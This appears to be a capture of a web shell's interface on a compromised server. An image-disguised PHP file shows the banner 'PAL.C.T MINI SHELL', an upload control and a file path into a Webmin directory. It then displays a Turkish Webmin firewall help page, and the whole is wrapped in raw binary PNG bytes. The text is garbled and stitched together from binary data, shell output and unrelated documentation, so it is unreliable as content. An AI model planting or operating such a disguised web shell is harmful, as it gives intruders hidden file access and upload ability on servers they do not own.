php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.tr.auto.html

<header> Linux Güvenlik Duvarı </header><h3> Modül tanıtımı </h3> Bu modül, 2.4 seri Linux çekirdeğinde bulunan IPtables güvenlik duvarı özelliklerini yapılandırmanıza olanak tanır. Diğer bazı güvenlik duvarı yapılandırma programlarının aksine, güvenlik duvarını oluşturan bir kabuk komut dosyası oluşturmak yerine, sırasıyla bir kaydetme dosyasını <tt>ipi (6) tables-restore</tt> ve <tt>ipi (6) tables-save</tt> tarafından okunup yazılan biçimde okur ve düzenler. <p> Sisteminizde el ile veya bir komut dosyasından ayarlanmış bir güvenlik duvarınız varsa, modül sizin için bir IPtables kayıt dosyasına dönüştürmeyi ve içindeki kuralları etkinleştirmek için önyükleme sırasında çalıştırılacak bir komut dosyası oluşturmayı önerir. dosya. Ancak bunu yaparsanız, güvenlik duvarı kuralları komut dosyanızı artık düzenlememeniz ve önyükleme sırasında da çalışmasını devre dışı bırakmanız gerekir. <p><h3> IPtables&#39;a genel bakış </h3> Sisteminize gelen, çıkan veya sisteminiz tarafından iletilen her ağ paketi, ona ne olacağını belirlemek için bir veya daha fazla zincirle kontrol edilir. Her zincir, her biri bir koşula (hangi paketlerle eşleştiğini belirlemek için) ve bir eyleme (eşleşen paketlere ne olacağını kontrol etmek için) olan sıfır veya daha fazla kural içerir. Her zincirin, herhangi bir kurala uymayan paketlere ne olacağını kontrol eden varsayılan bir eylemi de vardır. <p> Her zincir, şu anda üç tane olan bir tablonun parçasıdır: <ul><li> <b>Paket filtreleme ( <tt>filtre</tt> )</b> <br> Bu tablodaki zincirler, ağdaki diğer ana bilgisayarlardan sisteminize gelen verileri, kullanıcılar ve işlemler tarafından sisteminizden gönderilen verileri ve bir yönlendirici olarak çalışıyorsa sisteminiz tarafından iletilen verileri kontrol etmek için kullanılabilir. <p><li> <b>Ağ adresi çevirisi ( <tt>nat</tt> )</b> <br> Bu tablo, NAT veya maskelenme ayarlamak için kullanılabilir; bu, tüm makine ağına tek bir gerçek IP adresi üzerinden internete erişim vermek istiyorsanız kullanışlıdır. <p><li> <b>Paket değişikliği ( <tt>mangle</tt> )</b> <br> Bu tablo, sisteminiz tarafından iletilen veya sisteminizden gönderilen paketleri değiştirmek içindir. <p></ul> Her tablonun bir parçası olan standart zincirlere ek olarak, yerleşik zincirlerdeki kurallar tarafından çalıştırılabilen kendi zincirlerinizi de oluşturabilirsiniz. Bu, birden fazla yerde kullanılabilecek kuralları gruplandırmak ve paylaşmak için yararlı olabilir. <p><h3> Ana sayfa </h3> Bu modülün ana sayfası, sol üstteki listeden seçilen mevcut tablolardan birindeki tüm zincirleri ve kuralları listeler. Aşağıda, geçerli tablodaki her zincir için, her zincirdeki tüm kuralların listelendiği ve koşullarının modülün en iyi şekilde açıklandığı bir bölüm bulunmaktadır. Her zincir için, zincir tablo için yerleşik olanlardan biriyse açılır listeyi kullanarak varsayılan eylemi değiştirebilir veya kullanıcı tanımlıysa Zinciri sil düğmesiyle silebilirsiniz. <p> Bir zincirdeki herhangi bir kuralı düzenlemek için tıklayabilir, yukarı veya aşağı taşımak için her satırın sağındaki okları veya yeni bir kural eklemek için Kural ekle düğmesini tıklayabilirsiniz. Bir kural eklemek veya düzenlemek sizi, her kural için eylemi ve eylemin yürütülme koşullarını seçebileceğiniz bir sayfaya götürür. <p> Sayfanın altında, <tt>ipi (6) tables-restore</tt> komutuyla çekirdeğe yükleyerek geçerli güvenlik duvarı yapılandırmasını etkin hale getirmek için bir düğme bulunur. Aşağıda bunun tersini yapmak için bir düğme var - şu anda çekirdekte olan yapılandırmayı almak ve düzenleme için kullanılabilir hale getirmek. Son olarak, dağıtımınız destekliyorsa, güvenlik duvarının önyükleme zamanında etkinleştirilip etkinleştirilmeyeceğini değiştirmek için bir düğme vardır. <p><h3> Filtre zincirleri </h3> Harici iptables komut dosyalarıyla daha iyi işbirliği için tek tek zincirleri güvenlik duvarının işlemesinden hariç tutabilirsiniz. Bunu yapmak için, ayarlarda kuralların doğrudan işlenmesini seçmeli ve uygun zincirlerin işlenmesini engelleyen bir filtre listesi girmelisiniz. Düzenlemenin dışında bırakılmayan zincirler, &quot;güvenlik duvarı tarafından yönetilmez&quot; mesajı ile işaretlenir. <p><h3> IP Setleri </h3> İp (6) tablosunun daha yeni sürümleri ipset uzantısını destekler. IP setleri, ana bellekteki IP adreslerinin listeleridir; bunlar çok verimli bir şekilde aranabilir ve kurallarda bir koşul olarak kullanılabilir. Ana sayfada, kurallar tarafından kullanılabilen mevcut IP setleri görüntülenir. Ancak şu anda bunları güvenlik duvarında yönetmek mümkün değildir. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`